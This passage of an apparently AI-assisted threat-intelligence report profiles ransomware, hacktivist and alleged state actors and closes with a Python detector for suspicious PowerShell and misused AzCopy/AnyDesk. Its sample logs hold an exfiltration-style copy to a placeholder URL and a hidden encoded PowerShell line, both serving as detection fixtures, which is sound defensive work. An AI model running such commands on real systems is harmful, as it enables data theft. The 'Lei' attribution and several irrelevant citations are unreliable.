Ghost follows a standard extortion model: encrypting critical files, demanding ransom, and pressuring victims.9 While they claim data exfiltration, it is not always clear whether significant amounts are actually stolen or whether the threat of exposure is primarily leverage.9 Unlike groups with dedicated leak sites, Ghost may publish stolen data on platforms such as BreachForums or other underground forums.9 They use ransomware executables including Cring.exe, Ghost.exe, ElysiumO.exe, and Locker.exe, which can encrypt specific directories or entire storage while excluding certain files so that devices are not rendered inoperable.10 Ransoms typically range from tens to hundreds of thousands of dollars in cryptocurrency.10
- Associated Incidents (from this report):
- Incident ID: INC008 – Alleged leak of Police Department of Fulton: The alleged leak of internal data from the Fulton Police Department, posted under “DigitalGhost,” is a data-leak post on a forum rather than a ransomware deployment; it is consistent with the Ghost group’s practice of publishing on forums, but the link rests on the name match only.
- Incident ID: INC017 – Alleged Leak of Personally Identifiable Information of Indonesian Citizens: The alleged leak of personally identifiable information of Indonesian citizens, posted under “DigitalGhost,” is likewise a forum data-leak post; no evidence in the referenced material ties it to Ghost ransomware operations beyond the handle.
- giorggios
The handle “giorggios” is not associated with any recognized hacking group or cybercriminal entity in the referenced material.11 The only name matches found (a business case study and an unrelated political figure) have no bearing on this actor, so no motivations or TTPs can be stated.11 13
- Associated Incidents (from this report):
- Incident ID: INC009 – Alleged Breach of Indonesian Delivery Records: The alleged breach of Indonesian delivery records, attributed to “giorggios,” suggests an individual or group involved in data theft, likely for financial gain, but no specific threat intelligence on an actor of that name is provided. The claimed dataset (national ID numbers, phone numbers, and addresses for 30 million customers) would be a high-value input for fraud and phishing regardless of who is selling it.
- schabb0
The referenced material does not link the handle “schabb0” to any tracked threat actor. The cited analysis of the ScatterBrain obfuscating compiler concerns an unrelated toolset and provides no evidence about this seller.15
- Associated Incidents (from this report):
- Incident ID: INC012 – Alleged sale of Multichecker tool combining seed and Telegram data checking: The “Multichecker” tool advertised by “schabb0” is a harvesting utility for cryptocurrency wallets rather than an intrusion tool: it searches for BIP39 mnemonics and private keys and inspects stolen Telegram tdata session folders. Its existence is a reminder that an exported Telegram session directory is a credential, and that seed phrases stored in chats, saved messages, or files are recoverable by anyone who obtains that session.
- BlackH0le
The forum handle “BlackH0le” is mapped in this report to the BlackLock ransomware group; the referenced material does not confirm that mapping, and the profile below should be read with that caveat.
BlackLock (considered a new iteration of the El Dorado ransomware group) recently faced significant setbacks after security researchers exploited a vulnerability in its dark-web leak site.16 The compromise allowed researchers to inspect BlackLock’s network infrastructure, activity logs, hosting providers, and the linked MEGA accounts used to store victim data, intelligence that enabled the prediction and prevention of some planned attacks and the protection of undisclosed victims.16
Researchers identified 46 victims across sectors including electronics, academia, religious organizations, defense, healthcare, technology, IT/MSP vendors, and government agencies, located in numerous countries.16 There are noted links to the rival ransomware group DragonForce, with suggestions of a possible hijacking of BlackLock’s dark-web site, indicating either cooperation or a hostile takeover.16 The group used the file-sharing service MEGA to store and transfer stolen data.16 The vulnerability exploited was a misconfiguration in BlackLock’s site that exposed clearnet IP addresses and, through a Local File Include (LFI) flaw, gave access to configuration files and credentials.16 The recovered command history contained copy-pasted credentials and a detailed chronology of victim data publication, a major operational-security failure on the group’s part.16
- Associated Incidents (from this report):
- Incident ID: INC013 – Alleged database sale of Slate & Tell: The alleged sale of a Slate & Tell customer database, posted under “BlackH0le,” is a forum data sale; it is consistent with the data-theft side of a ransomware operation, but the attribution to BlackLock rests on the handle alone.
- VirXploit24
The referenced material provides no specific intelligence on the actor “VirXploit24.” The cited weekly report describes unrelated items (the Brain Cipher ransomware, which uses AES-256 with RSA-2048 key wrapping, and an unrelated CVSS 9.8 authentication-bypass vulnerability) and says nothing about this handle.17 What the page itself supports is more useful: both of this actor’s posts are titled as stealer logs, meaning credentials harvested by infostealer malware from infected end-user devices and then aggregated, rather than evidence of a server-side breach of either organization.
- Associated Incidents (from this report):
- Incident ID: INC014 – Alleged Credential Data Leak of Pemprov DKI Jakarta Accounts: The credentials posted under “VirXploit24” are advertised as stealer logs for Pemprov DKI Jakarta accounts. The practical response is to identify affected accounts, force resets and session revocation, and treat the underlying user devices as compromised.
- Incident ID: INC016 – Alleged Credential Data Leak of Bank Syariah Indonesia (BSI) Accounts: The BSI credentials posted under the same handle are likewise advertised as stealer logs; for a bank, the additional risk is reuse of the same passwords across customer-facing and internal portals.
- Montanavip
The referenced material does not contain any specific information about a threat actor named “Montanavip,” so details regarding their motivations, TTPs, or known activities are unavailable.
- Associated Incidents (from this report):
- Incident ID: INC018 – Alleged Sale of 880 Million Passwords: The alleged sale of 880 million unique passwords for $20, attributed to “Montanavip,” is large-scale data brokering at commodity prices; lists of this kind are the raw material for password-spraying and credential-stuffing wordlists, which is why blocklist checks against known-breached passwords matter more than complexity rules.
- wndyn1337
The referenced material does not contain any specific information about a threat actor named “wndyn1337,” so details regarding their motivations, TTPs, or known activities are unavailable.
- Associated Incidents (from this report):
- Incident ID: INC019 – Alleged Sale of High Balance Non-VBV Cards from Worldwide Sources: The alleged sale of high-balance non-VBV cards, attributed to “wndyn1337,” indicates an individual or group involved in payment-card fraud; cards without a 3-D Secure enrolment are sought precisely because the issuer never challenges the transaction with a second factor.
- sexypinky
The handle “sexypinky” does not correspond to any recognized cyber threat actor or hacking group in the referenced material.18 The string appears in the rockyou.txt password list and in unrelated film references, so it is a common token rather than a group designation, and nothing links it to prior cybercrime activity.18 19
- Associated Incidents (from this report):
- Incident ID: INC020 – Alleged Sale of Brute-Force Toolkit Targeting VPNs: Cisco, RDWeb, and GP: The alleged sale of the VPNStrike toolkit is attributable only to the forum handle “sexypinky.” The product itself is the more informative indicator: subdomain discovery followed by portal login checking is exactly the activity that shows up as bursts of failed VPN logons from a single source.
B. Hacktivist Groups
Hacktivist groups, driven by ideological, social, or political agendas, employ cyber means to achieve their objectives, often causing disruption and reputational damage.
- NDT SEC
NDTsec is a Cambodian hacktivist group that has been observed attacking Thailand’s infrastructure.23 Its activity is driven by geopolitical tensions and cultural grievances, such as disputes over territorial claims or accusations of cultural appropriation.23 NDTsec, along with groups such as “Anonymous Cambodia” and “riSofly,” targets various Thai entities, including banks, airports, and the Royal Thai Navy.23 Its tactics include data leaks and Distributed Denial of Service (DDoS) attacks against websites, causing server disruptions.23 The group has also conducted similar attacks in Indonesia, Malaysia, and India, often seizing on contentious issues as a pretext.25 These groups typically target government institutions and corporations to make political statements.24
- Associated Incidents (from this report):
- Incident ID: INC004 – Alleged data leak of Rajamangala University of Technology Rattanakosin (RMUTR): The alleged leak of an RMUTR database dump, attributed to “NDT SEC,” matches the group’s pattern of data leaks against Thai institutions, including universities, for political or cultural motives.
- Incident ID: INC010 – NDT SEC claims to target Thailand: The group’s announcement that it is targeting Thailand is consistent with its documented motivation as a Cambodian hacktivist group focused on Thai infrastructure.
- Incident ID: INC015 – Alleged data breach of Bangkok Airways: The alleged Bangkok Airways breach, attributed to “NDT SEC,” fits the group’s record of targeting Thai transportation and financial entities for data leaks and disruption.
- Team 1722
Team 1722 is identified as one of the most active hacktivist groups in the first quarter of 2025 [26]. They are mentioned alongside other pro-Russian hacktivists like NoName057(16), Hacktivist Sandworm, Z-pentest, Sector 16, and Overflame, who primarily target NATO-aligned nations and Ukraine supporters [27]. While the research material confirms their consistent activity, specific details regarding their origin, precise TTPs, or detailed targets beyond general alignment with pro-Ukrainian, pro-Palestinian, and anti-establishment hacktivists are not extensively provided [27]. Their activity contributes to the observed surge in hacktivist attacks on Industrial Control Systems (ICS) and Operational Technology (OT), which increased by 50% in March, as pro-Russian actors increasingly exploit internet-facing ICS/OT for wider political and economic impact [27].
- Associated Incidents (from this report):
- Incident ID: INC006 – Team 1722 targets the website of Amma’s Tasty & Healthy Food: The defacement of Amma’s Tasty & Healthy Food website, attributed to “Team 1722,” aligns with the general tactics of hacktivist groups, which often include website defacement to make a statement or showcase capabilities.
- GhostSec (aka GhostSecMafia, GSM)
GhostSec is a highly organized hacktivist group with historical ties to the “Anonymous” collective [28]. Emerging in 2015, their initial focus was on countering online terrorism and violent extremism, specifically targeting groups like ISIS and Al-Qaeda through DDoS attacks, system intrusion, webpage defacement, and data leaks [28].
A significant shift occurred in late July 2022, when GhostSec announced the launch of “GhostSec Mafia Premium,” a subscription-based Telegram channel, explicitly stating, “Hacktivism does not pay the bills!” [28]. This marked their transition to a financially motivated cyber mafia organization, engaging in cybercriminal activities, including selling initial access and developing modular ransomware like GhostLocker (a Ransomware-as-a-Service, RaaS) [29]. They collaborated with Stormous, another group from “The Five Families” hacker collective, on double extortion ransomware attacks across various business sectors and countries [29].
However, GhostSec recently announced a shift back from financially motivated cybercrime to hacktivism, planning to cease all cybercrime services and transfer clients to Stormous [29]. They aim to return to social and political activism, maintaining private channels and potentially launching a hacking course [29]. This group demonstrates a fluid motivation, adapting between ideological and financial objectives [29].
- Associated Incidents (from this report):
- Incident ID: INC021 – GhostSec targets North Macedonia’s critical infrastructure and Kabelnet Group network systems: The cyberattack targeting critical infrastructure in North Macedonia, attributed to “GhostSec,” aligns with the group’s historical and recent focus on hacktivism, including disruptive attacks against government and public sector entities.
- Z-PENTEST ALLIANCE
The Z-PENTEST ALLIANCE first appeared in October 2023, with probable origins in Serbia but maintaining close ties to pro-Russian actors [18]. Their geopolitical motivation is to weaken industrial and control systems (ICS/SCADA) in Western countries, thereby strengthening Russia’s geopolitical influence by exploiting technological vulnerabilities [18]. They also aim to weaken Western solidarity and create divisions within NATO [18].
Z-Pentest primarily targets critical infrastructure, specifically the energy (oil and gas) and water sectors, aiming to manipulate critical functions such as water pumping, gas, and oil distribution management [18]. Targeted countries include the United States, Canada, Australia, France, South Korea, Taiwan, Italy, Romania, Germany, and Poland [18].
Their techniques include penetrating operational control systems (OT), exploiting ICS/SCADA systems, and utilizing zero-day vulnerabilities, often obtained from the dark web or through collaboration [18]. They employ social engineering, use information from data leaks for targeted attacks, and operate in a decentralized, anonymous manner [18]. The group coordinates attacks on Telegram and private forums, using platforms like X (Twitter) for propaganda [18]. They develop specialized tools for OT system penetration and engage in the sale of access to industrial systems and zero-day vulnerabilities on the dark web [18]. Z-Pentest also releases videos showcasing OT system manipulations to instill fear and influence victims [18]. They often collaborate with groups like SECTOR16, OverFlame, and People’s Cyber Army (PCA), as well as other pro-Palestine, pro-Russian, and anti-establishment hacktivist groups [18].
- Associated Incidents (from this report):
- Incident ID: INC011 – Alleged Unauthorized Access to Valmont Solar: The alleged unauthorized access to Valmont Solar, attributed to “Z-PENTEST ALLIANCE,” aligns with this group’s primary targets in the energy sector and their motivation to weaken industrial systems.
- Vaquill4 (aka Guacamaya, alina, weichafe)
“Vaquill4” is an alias for the Guacamaya hacktivist group [30]. Guacamaya is an international group of hackers primarily focused on Central and Latin America [31]. They are motivated by anti-imperialism and environmentalism, fighting against transnational corporations and external intervention in Latin America, particularly extractivism and the armed forces [31]. The group has published anonymous reports and leaked sensitive files in the public interest through Distributed Denial of Secrets or directly via links on the Enlace Hacktivista platform [31]. They have successfully hacked major corporations and governments in Chile, Colombia, El Salvador, Guatemala, Mexico, and Peru [31]. Their TTPs include infiltrating mining and oil companies, police, and Latin American regulatory agencies [23]. They release large volumes of data, with one recent dump involving approximately 10 terabytes of emails and other materials from military and police agencies [23].
- Associated Incidents (from this report):
- Incident ID: INC023 – Alleged Data Leak of Ecuadorian Citizens: The alleged data leak of Ecuadorian citizens, attributed to “Vaquill4,” directly reflects the documented activities and motivations of the Guacamaya hacktivist group, which focuses on data exfiltration from governmental and corporate entities in Latin America.
C. Nation-State and Espionage Actors
Nation-state actors, often highly resourced and sophisticated, engage in cyber activities for espionage, data theft, and network disruption or destruction, typically for strategic advantage.
- Lei (aka PLA Unit 61398, APT1, Comment Crew, Comment Panda, GIF89a, Byzantine Candor)
The term “Lei” in the context of threat actors often refers to the Legal Entity Identifier (LEI) system, which is a global standard (ISO 17442) designed to uniquely identify legal entities in financial transactions [32]. While not a threat actor itself, the LEI system is crucial for financial institutions to identify ICT service providers and monitor third-party risks, as mandated by regulations like DORA (Digital Operational Resilience Act) [32]. The LEI system aims to improve transparency, reduce redundancies, and help regulators monitor the stability of and threats to the financial system [33]. However, in a broader cybersecurity context, “Lei” could also refer to individuals or groups with that name involved in hacking. For instance, Xia Lei was indicted as part of the BOYUSEC HACKERS, a Chinese-based group accused of conspiring to hack into private corporate entities to steal sensitive internal information from financial, engineering, and technology industries [17]. This group’s activities, along with those of PLA Unit 61398 (also known as APT1), a Chinese military unit alleged to be a source of Chinese computer hacking attacks, highlight the persistent threat of state-sponsored espionage and intellectual property theft [17]. PLA Unit 61398 is known for targeting over 1,000 organizations, including government agencies, and has been cited by US intelligence agencies since 2002 [35].
- Associated Incidents (from this report):
- Incident ID: INC022 – Alleged Leak of Vulnerability on the Website of Jabatan Kemajuan Islam Malaysia (JAKIM): The alleged leak of a vulnerability on the website of Jabatan Kemajuan Islam Malaysia (JAKIM), attributed to “Lei,” aligns with the activities of nation-state actors or state-sponsored groups known for exploiting vulnerabilities in government systems for espionage or strategic advantage.
V. Key Trends and Observations
The analysis of recent incidents and the broader threat landscape reveals several overarching patterns that warrant close attention from cybersecurity professionals and organizational leaders.
- The Proliferation of AI in Offensive Cyber Operations
A notable trend is the increasing integration of Artificial Intelligence (AI) into offensive cyber operations. Over 57 distinct threat actors, with ties to nation-states like China, Iran, North Korea, and Russia, have been observed leveraging AI technology, particularly Google’s Gemini, to enhance their malicious cyber and information operations [1]. While these actors are currently experimenting with AI primarily for productivity gains rather than developing entirely new capabilities, its impact is already significant. AI is being used for research, troubleshooting code, and creating and localizing content, making existing attack methods more efficient and scalable [1]. For instance, AI tools are being exploited to build trust in B2B phishing campaigns [36]. This indicates that AI is rapidly becoming a force multiplier for threat actors, enabling more convincing and automated attacks. The quality and volume of AI-enhanced social engineering and malware development are expected to increase, demanding a corresponding acceleration in defensive capabilities.
- The Evolving Landscape of Ransomware and Extortion
Ransomware attacks have fundamentally evolved beyond mere data encryption to become sophisticated, multi-stage extortion operations. Groups like Ghost ransomware (DigitalGhost) are now routinely exfiltrating sensitive data before encrypting files, making data exposure the primary leverage point, even for organizations with robust backup systems [9]. This shift means that the risk is no longer solely about data unavailability, which backups can mitigate, but about data confidentiality, intellectual property theft, and severe reputational damage [9]. The emergence of Ransomware-as-a-Service (RaaS) models, exemplified by GhostLocker, further professionalizes the cybercriminal industry, complete with pricing structures, affiliate panels, and dedicated leak sites on the TOR network [29]. This lowers the barrier to entry for less skilled attackers to launch impactful campaigns, signifying a mature and highly organized criminal ecosystem. The implication is that defense strategies must prioritize Data Loss Prevention (DLP) and robust detection of data exfiltration attempts prior to encryption, and incident response plans must account for public shaming and complex negotiation tactics.
- The Escalation and Hybridization of Hacktivism
Hacktivist groups are demonstrating increasing aggression and capability, moving beyond traditional disruption to destructive attacks on critical infrastructure and engaging in financially motivated cybercrime. A significant 50% surge in hacktivist attacks on Industrial Control Systems (ICS) and Operational Technology (OT) was observed in March [26]. Groups like the Z-PENTEST ALLIANCE explicitly target critical infrastructure, such as energy and water sectors, for geopolitical influence [18]. The emergence of “multi-vector and coalition attacks” and the destructive capabilities of groups like C.A.S. (exfiltrating terabytes of data and destroying infrastructure) indicate a more potent threat [27]. Furthermore, the fluidity in motivations is evident, as seen with GhostSec’s explicit pivot between hacktivism and financial cybercrime, and their recent announcement of a return to hacktivism [28]. This suggests that hacktivist groups are becoming more adaptable, responding rapidly to geopolitical shifts and economic opportunities. Critical infrastructure organizations must elevate their defenses against hacktivists to the level of nation-state or sophisticated criminal threats, focusing on OT/ICS security and developing comprehensive crisis communication plans to address the psychological warfare aspects of these attacks.
- The Reliance on Commodity Tools and Unpatched Vulnerabilities
Despite the rise of sophisticated actors, a significant portion of successful cyberattacks continues to stem from the exploitation of known weaknesses and the misuse of legitimate software tools. Groups like Ghost (DigitalGhost) frequently exploit “publicly known vulnerabilities” and leverage “commercially available adversary simulation tool[s]” like Cobalt Strike [9]. Similarly, financially motivated actors like Vanilla Tempest (Microsoft’s DEV-0832) use legitimate tools such as AnyDesk, MEGA, Azure Storage Explorer, and AzCopy for remote monitoring, data synchronization, and large-scale data exfiltration [37]. This approach lowers the technical barrier for attackers, as they do not need to develop zero-day exploits. This pattern underscores the enduring importance of foundational cybersecurity hygiene, timely patching of known exploited vulnerabilities, and strict monitoring of legitimate tools for anomalous or unauthorized behavior [3]. Organizations must assume that adversaries will leverage these common methods, making prevention of exploitation and detection of suspicious activity involving trusted software paramount.
- Broader Implications for Cybersecurity Defense
The increasing interconnectedness and specialization within the cybercrime ecosystem, where Initial Access Brokers (IABs) like ToyMaker facilitate ransomware groups, and RaaS providers offer sophisticated tools, demand a holistic threat intelligence approach [2]. Organizations need to map the relationships and supply chains of adversaries to anticipate and defend against multi-stage, multi-actor campaigns, rather than focusing on isolated incidents or individual malware families. The weaponization of psychological warfare, as evidenced by Z-PENTEST ALLIANCE’s intimidation tactics and disinformation campaigns, necessitates a broader defense strategy that extends beyond technical controls [18]. This includes robust crisis communication plans, public relations strategies, and internal psychological resilience training for key personnel. The rapid re-tooling and emergence of new threats following major takedowns, such as Squirrelwaffle filling the void left by Emotet, highlights the dynamic nature of the threat landscape [38]. Organizations must maintain continuous threat intelligence monitoring and foster adaptive defenses that can quickly respond to shifts in adversary TTPs and the emergence of new tools or groups.
VI. Recommendations and Mitigations
To effectively counter the evolving cyber threat landscape, organizations must adopt a layered and proactive security posture.
- General Best Practices for Enhancing Organizational Cybersecurity Posture:
- Implement a Robust Vulnerability Management Program: Regularly scan for, prioritize, and promptly patch known exploited vulnerabilities, especially on internet-facing systems and critical infrastructure components. This foundational defense is crucial against groups like DigitalGhost, which frequently exploit unpatched systems [9].
- Strengthen Identity and Access Management (IAM): Enforce Multi-Factor Authentication (MFA) across all accounts, particularly for privileged users and remote access. Implement the principle of least privilege, ensuring users and systems only have the minimum access required for their functions, thereby limiting potential damage in case of a compromise [3].
- Enhance Endpoint Detection and Response (EDR/XDR): Deploy advanced EDR/XDR solutions capable of detecting sophisticated post-compromise activities, including EDR bypass attempts (as seen with FIN7) and the anomalous use of legitimate tools [39]. Actively monitor for suspicious PowerShell activity and other scripting misuse, as these are common attacker techniques.
- Improve Email and Web Security: Implement advanced email gateways and web filters to detect and block sophisticated phishing campaigns, including those enhanced by AI for realism [36]. Conduct regular, adaptive security awareness training that addresses evolving social engineering tactics, including AI-generated content and “ClickFix” methods, to empower employees as a strong line of defense [17].
- Data Protection and Recovery: Implement Data Loss Prevention (DLP) tools and continuous network monitoring to detect and prevent data exfiltration attempts, which are now a primary leverage point for ransomware groups [9]. Maintain immutable and isolated backups for rapid operational recovery from ransomware attacks, but recognize that data exfiltration poses a distinct and ongoing risk that requires separate mitigation strategies.
- Network Segmentation: Segment networks, particularly for critical systems, sensitive data environments, and Operational Technology (OT)/Industrial Control Systems (ICS), to limit lateral movement and contain the impact of breaches [10]. This prevents an initial compromise from escalating into a widespread systemic failure.
- Comprehensive Logging and Monitoring: Prioritize comprehensive logging, including command-line interface (CLI) activity, and establish a baseline for normal host and user behavior to detect anomalous activity on endpoints and across the network [10]. Proactive threat hunting, where human analysts actively seek out and investigate unusual activity, is also highly recommended [4].
- Specific, Actionable Recommendations Tailored to Counter Identified Threat Actors:
- Against AI-Enhanced Threats (e.g., Nation-State Actors – Person57 [1]): Organizations should invest in and deploy AI-driven security tools and analytics platforms capable of detecting subtle anomalies in content, code, and user behavior that indicate AI-generated attacks or AI-assisted operations. Continuous updates to security awareness training should include specific examples and warnings about AI-generated phishing, deepfakes, and highly personalized social engineering lures, as these threats become increasingly convincing.
- Against Ransomware Groups (e.g., DigitalGhost, BlackH0le [9]): Focus on early-stage intrusion detection, such as unusual PowerShell execution, Cobalt Strike beacons, and web shell deployment, to disrupt attacks before ransomware encryption or significant data exfiltration occurs. Develop and regularly test robust incident response plans that specifically account for data exfiltration scenarios, potential public shaming on leak sites, and the complexities of ransom negotiations. Implement strict controls over the use of legitimate administrative tools within the environment and monitor for their anomalous usage, as these are frequently repurposed by adversaries.
- Against Hacktivists Targeting Critical Infrastructure (e.g., Z-PENTEST ALLIANCE, Team 1722 [18]): Conduct specialized OT/ICS cybersecurity assessments and implement defense-in-depth strategies tailored to industrial control systems, including air-gapping where feasible and robust perimeter security. Develop and exercise comprehensive crisis communication plans to counter psychological warfare, disinformation campaigns, and public pressure tactics often employed by these groups.
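The logging recommendation above (baseline normal host and user behaviour, log CLI activity) and the ransomware recommendation (catch unusual PowerShell execution and anomalous use of legitimate administrative tools early) describe the same detection pattern. The following Python script is an added example and is not from the report or any of its cited sources. It learns, from a baseline window of process-creation logs, which host/user pairs legitimately run dual-use tools such as AnyDesk and AzCopy, then scans a later day's log for encoded or suspicious PowerShell command lines and dual-use tool executions outside that baseline. The pipe-delimited log format, host names, user names, paths and URLs are all constructed for the example; the dual-use tool list and PowerShell switch patterns are assumptions a defender would tune to their own environment.

```python
"""Baseline-driven detection of anomalous dual-use tool execution and suspicious
PowerShell in process-creation logs. Added example with constructed data."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Legitimate tools the report notes are repurposed for remote access and bulk
# exfiltration. Assumed list; extend with whatever is dual-use in your estate.
DUAL_USE_TOOLS = {"anydesk.exe", "azcopy.exe", "megacmd.exe", "storageexplorer.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# -e / -ec / -enc / -EncodedCommand followed by a long base64 blob.
ENCODED_PS = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
# Switches and cmdlets that rarely appear in routine administration (assumed set).
SUSPICIOUS_PS = re.compile(
    r"(?i)(-nop\b|-w\s+hidden|-noni\b|bypass|downloadstring|frombase64string|\biex\b)"
)


@dataclass(frozen=True)
class ProcEvent:
    ts: str
    host: str
    user: str
    image: str
    cmdline: str


def parse_line(line: str) -> Optional[ProcEvent]:
    """Parse one constructed log line of the form ts|host|user|image|cmdline."""
    parts = line.strip().split("|", 4)
    if len(parts) != 5:
        return None  # empty or malformed line
    return ProcEvent(*parts)


def parse_log(text: str) -> List[ProcEvent]:
    return [ev for ev in (parse_line(l) for l in text.splitlines()) if ev]


def image_name(ev: ProcEvent) -> str:
    """Lower-cased file name of the executed image, without its directory."""
    return ev.image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def build_baseline(events: List[ProcEvent]) -> Dict[str, Set[Tuple[str, str]]]:
    """Record which (host, user) pairs ran each dual-use tool in the learning window."""
    baseline: Dict[str, Set[Tuple[str, str]]] = defaultdict(set)
    for ev in events:
        name = image_name(ev)
        if name in DUAL_USE_TOOLS:
            baseline[name].add((ev.host.lower(), ev.user.lower()))
    return baseline


def detect(events: List[ProcEvent],
           baseline: Dict[str, Set[Tuple[str, str]]]) -> List[Tuple[str, str, str]]:
    """Return (timestamp, host, finding) triples for events worth an analyst's time."""
    findings = []
    for ev in events:
        name = image_name(ev)
        key = (ev.host.lower(), ev.user.lower())
        if name in POWERSHELL:
            if ENCODED_PS.search(ev.cmdline):
                findings.append((ev.ts, ev.host, "encoded_powershell"))
            elif SUSPICIOUS_PS.search(ev.cmdline):
                findings.append((ev.ts, ev.host, "suspicious_powershell"))
        elif name in DUAL_USE_TOOLS and key not in baseline.get(name, set()):
            findings.append((ev.ts, ev.host, f"unbaselined_tool:{name}"))
    return findings


# Constructed learning-window log: IT admin uses AnyDesk, backup service uses AzCopy.
BASELINE_LOG = r"""
2025-06-04T09:00:00Z|WS-IT-01|CORP\itadmin|C:\Program Files\AnyDesk\AnyDesk.exe|"C:\Program Files\AnyDesk\AnyDesk.exe"
2025-06-04T22:00:00Z|SRV-BACKUP|CORP\svc_backup|C:\Tools\azcopy.exe|azcopy.exe sync D:\Backups https://backupstore.example.invalid/nightly
"""

# Constructed day log. The -enc payload decodes to the harmless "Get-Date";
# the storage URL is a placeholder.
DAY_LOG = r"""
2025-06-05T08:05:12Z|WS-IT-01|CORP\itadmin|C:\Program Files\AnyDesk\AnyDesk.exe|"C:\Program Files\AnyDesk\AnyDesk.exe"
2025-06-05T02:10:01Z|FS-01|CORP\jsmith|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc RwBlAHQALQBEAGEAdABlAA==
2025-06-05T02:13:44Z|FS-01|CORP\jsmith|C:\Users\jsmith\Downloads\azcopy.exe|azcopy.exe copy D:\Finance https://PLACEHOLDER-STORAGE.example.invalid/out --recursive
2025-06-05T22:00:00Z|SRV-BACKUP|CORP\svc_backup|C:\Tools\azcopy.exe|azcopy.exe sync D:\Backups https://backupstore.example.invalid/nightly
2025-06-05T08:30:00Z|WS-HR-07|CORP\hr_user|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -Command Get-Service Spooler
2025-06-05T09:12:30Z|WS-HR-07|CORP\hr_user|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File C:\Temp\update.ps1
"""


def run_example() -> List[Tuple[str, str, str]]:
    baseline = build_baseline(parse_log(BASELINE_LOG))
    return detect(parse_log(DAY_LOG), baseline)


if __name__ == "__main__":
    for ts, host, what in run_example():
        print(f"{ts} {host} {what}")
```

Against the constructed data the script stays quiet for the IT admin's AnyDesk session and the backup service's AzCopy job, because both were seen in the learning window, and raises three findings: the encoded PowerShell on FS-01, the AzCopy run from a user's Downloads folder on the same host, and the execution-policy-bypass PowerShell on the HR workstation. In production the baseline would be built from weeks of EDR or Sysmon process telemetry rather than two lines, and an unbaselined AzCopy run would be correlated with egress volume before escalation.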
Works cited
1. Google: Over 57 Nation-State Threat Groups Using AI for Cyber Operations, accessed June 5, 2025, https://thehackernews.com/2025/01/google-over-57-nation-state-threat.html
2. ToyMaker Uses LAGTOY to Sell Access to CACTUS Ransomware …, accessed June 5, 2025, https://thehackernews.com/2025/04/toymaker-uses-lagtoy-to-sell-access-to.html
3. Threat Actors: Common Types & Best Defenses Against Them | Splunk, accessed June 5, 2025, https://www.splunk.com/en_us/blog/learn/threat-actors.html
4. What is a Cyber Threat Actor? | CrowdStrike, accessed June 5, 2025, https://www.crowdstrike.com/en-us/cybersecurity-101/threat-intelligence/threat-actor/
5. This saddens me to no end: Gumball and TMNT actor Nicolas Cantu verbally abuses Uber driver and passenger, including homophobia, antisemitism and threats of physical assault. – Reddit, accessed June 5, 2025, https://www.reddit.com/r/TMNT/comments/17y3cwf/this_saddens_me_to_no_end_gumball_and_tmnt_actor/
6. A legal threat to a podcast app for using open RSS – Podnews, accessed June 5, 2025, https://podnews.net/update/legal-threat-lawyer
7. The Amazing World of Gumball | Hack the Internet | Cartoon Network – YouTube, accessed June 5, 2025, https://www.youtube.com/watch?v=nRwBWamtEzc
8. Cyberspace Hack | The Amazing World of Gumball | Cartoon Network – YouTube, accessed June 5, 2025, https://www.youtube.com/watch?v=j2wazCmNYaw
9. Ghost Ransomware Attacks: Understanding the Threat and … – Veeam, accessed June 5, 2025, https://www.veeam.com/blog/ghost-ransomware-attacks-understanding-the-threat-and-strengthening-defenses.html
10. #StopRansomware: Ghost (Cring) Ransomware | CISA, accessed June 5, 2025, https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-050a
11. MSL 843: Logistics & Supply Chain Management – IIT Delhi, accessed June 5, 2025, https://web.iitd.ac.in/~ravi1/scm2019.htm
12. MCL 726: Supply Chain Management – IIT Delhi, accessed June 5, 2025, https://web.iitd.ac.in/~ravi1/scm2011.htm
13. Italian ministries hit by pro-Russian cyberattacks – TVP World, accessed June 5, 2025, https://tvpworld.com/84466557/-pro-russian-hackers-target-italian-government-and-public-service-websites
14. George Hotz – Wikipedia, accessed June 5, 2025, https://en.wikipedia.org/wiki/George_Hotz
15. ScatterBrain: Unmasking the Shadow of PoisonPlug’s Obfuscator | Google Cloud Blog, accessed June 5, 2025, https://cloud.google.com/blog/topics/threat-intelligence/scatterbrain-unmasking-poisonplug-obfuscator
16. Security researchers hack BlackLock ransomware gang in push …, accessed June 5, 2025, https://www.itpro.com/security/ransomware/security-researchers-hack-blacklock-ransomware-gang
17. Weekly Intelligence Report – 16 May 2025 – CYFIRMA, accessed June 5, 2025, https://www.cyfirma.com/news/weekly-intelligence-report-16-may-2025/
18. Z-PENTEST ALLIANCE – Cyber Intelligence Bureau – Orange …, accessed June 5, 2025, https://www.orangecyberdefense.com/fileadmin/global/CyberIntelligenceBureau/Gangs_Investigations/z-pentest/Z-Pentest_Alliance.pdf
19. Female Yakuza Tale – Inquisition and Torture | Amazon.com.br, accessed June 5, 2025, https://www.amazon.com.br/Female-Yakuza-Tale-Inquisition-Torture/dp/B000AQKUWW
20. Female Yakuza Tale – Inquisition and Torture [DVD 883164100492| eBay, accessed June 5, 2025, https://www.ebay.com/itm/354938630592
21. Catalog – Sportlet Store, accessed June 5, 2025, https://sportlet.store/en/home?resultsPerPage=200
22. rockyou.txt – Computer Science and Engineering, accessed June 5, 2025, https://www.cse.msu.edu/~cse231/PracticeOfComputingUsingPython/04_Functions1/Password_Cracking/rockyou.txt
23. Hacking group focused on Central America dumps 10 terabytes of …, accessed June 5, 2025, https://cyberscoop.com/central-american-hacking-group-releases-emails/
24. Tactics and Motivations of Modern Hacktivists – CYFIRMA, accessed June 5, 2025, https://www.cyfirma.com/research/tactics-and-motivations-of-modern-hacktivists/
25. Warning: Cyber attacks have been used to create hatred against Cambodians – Cofact, accessed June 5, 2025, https://blog.cofact.org/warning-cyber-attacks-have-been-used-to-create-hatred-against-cambodians/
26. Rise in hacktivist threats to critical sector, as pro-Russian groups …, accessed June 5, 2025, https://industrialcyber.co/reports/rise-in-hacktivist-threats-to-critical-sector-as-pro-russian-groups-cause-50-rise-in-ics-ot-attacks-in-march/
